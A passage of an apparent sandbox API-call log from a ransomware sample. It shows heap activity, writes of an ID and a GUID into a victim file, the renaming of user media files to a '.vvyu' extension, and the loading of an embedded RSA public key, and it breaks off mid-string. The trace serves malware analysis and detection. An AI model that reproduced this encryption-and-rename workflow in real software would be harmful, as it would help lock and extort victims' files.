RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2af3f88 [0196.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0196.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea380 [0196.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6608 [0196.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea3c8 [0196.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6620 [0196.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6650 [0196.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66b0 [0196.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6668 [0196.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0196.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0196.609] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0196.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af4180 [0196.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6650 | out: hHeap=0x2c0000) returned 1 [0196.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6668 | out: hHeap=0x2c0000) returned 1 [0196.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66b0 | out: hHeap=0x2c0000) returned 1 [0196.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0196.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66b0 [0196.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0196.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6668 [0196.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6650 [0196.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0196.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0196.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0196.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0196.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0196.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0196.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0196.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6668 | out: hHeap=0x2c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6650 | out: hHeap=0x2c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66b0 | out: hHeap=0x2c0000) returned 1 [0196.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0196.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0196.613] GetCurrentThreadId () returned 0x5d8 [0196.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0196.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af20c0 [0196.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0196.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0196.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0196.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0196.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0196.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.614] GetCurrentThreadId () returned 0x5d8 [0196.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0196.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0196.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0196.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0196.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0196.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0196.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0196.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae66b0 [0196.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0196.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0196.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0196.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0196.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0196.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0196.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6650 [0196.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0196.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0196.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0196.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0196.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0196.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6668 [0196.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0196.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0196.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0196.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6638 [0196.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0196.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66c8 [0196.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0196.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0196.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6698 [0196.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0196.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6680 [0196.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae66e0 [0196.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6680 | out: hHeap=0x2c0000) returned 1 [0196.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6680 [0196.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6698 | out: hHeap=0x2c0000) returned 1 [0196.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0196.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0196.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0196.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0196.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0196.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6650 | out: hHeap=0x2c0000) returned 1 [0196.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6650 [0196.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0196.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0196.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66b0 | out: hHeap=0x2c0000) returned 1 [0196.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0196.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66e0 | out: hHeap=0x2c0000) returned 1 [0196.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0196.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0196.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0196.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0196.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0196.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6650 | out: hHeap=0x2c0000) returned 1 [0196.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0196.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0196.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0196.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0196.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0196.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0196.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0196.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0196.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0196.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0196.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0196.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0196.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0196.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6680 | out: hHeap=0x2c0000) returned 1 [0196.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0196.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66c8 | out: hHeap=0x2c0000) returned 1 [0196.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0196.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6668 | out: hHeap=0x2c0000) returned 1 [0196.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6638 | out: hHeap=0x2c0000) returned 1 [0196.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0196.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0196.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0196.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6620 | out: hHeap=0x2c0000) returned 1 [0196.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea3c8 | out: hHeap=0x2c0000) returned 1 [0196.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0196.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0196.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0196.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0196.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0196.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0196.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0196.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0196.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0196.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0196.626] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x10e27, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x10e27, lpOverlapped=0x0) returned 1 [0196.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0196.627] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10e2c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.627] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0196.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0196.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0196.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0196.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0196.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0196.629] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0196.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0196.629] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.629] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0196.629] CloseHandle (hObject=0x584) returned 1 [0196.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0196.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x2af3f88 [0196.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0196.632] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\oq0H.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\oq0h.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\oq0H.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\oq0h.flv.vvyu")) returned 1 [0196.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0196.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.634] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0196.637] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5c3e2b0, ftCreationTime.dwHighDateTime=0x1d8a10a, ftLastAccessTime.dwLowDateTime=0x409146d0, ftLastAccessTime.dwHighDateTime=0x1d8a5a1, ftLastWriteTime.dwLowDateTime=0x409146d0, ftLastWriteTime.dwHighDateTime=0x1d8a5a1, nFileSizeHigh=0x0, nFileSizeLow=0x9833, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="q-8_5Alv-AYsZTdLcX.m4a", cAlternateFileName="Q-8_5A~1.M4A")) returned 1 [0196.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0196.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x29edc48 [0196.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0196.637] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\q-8_5Alv-AYsZTdLcX.m4a") returned=".m4a" [0196.637] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\q-8_5Alv-AYsZTdLcX.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\q-8_5alv-aysztdlcx.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0196.638] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=38963) returned 1 [0196.638] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0196.643] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x980d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.643] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0196.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0196.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0196.645] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.645] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x9833, lpOverlapped=0x0) returned 1 [0196.646] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.646] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0196.646] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.646] lstrlenA (lpString="-----BEGIN PUBLIC 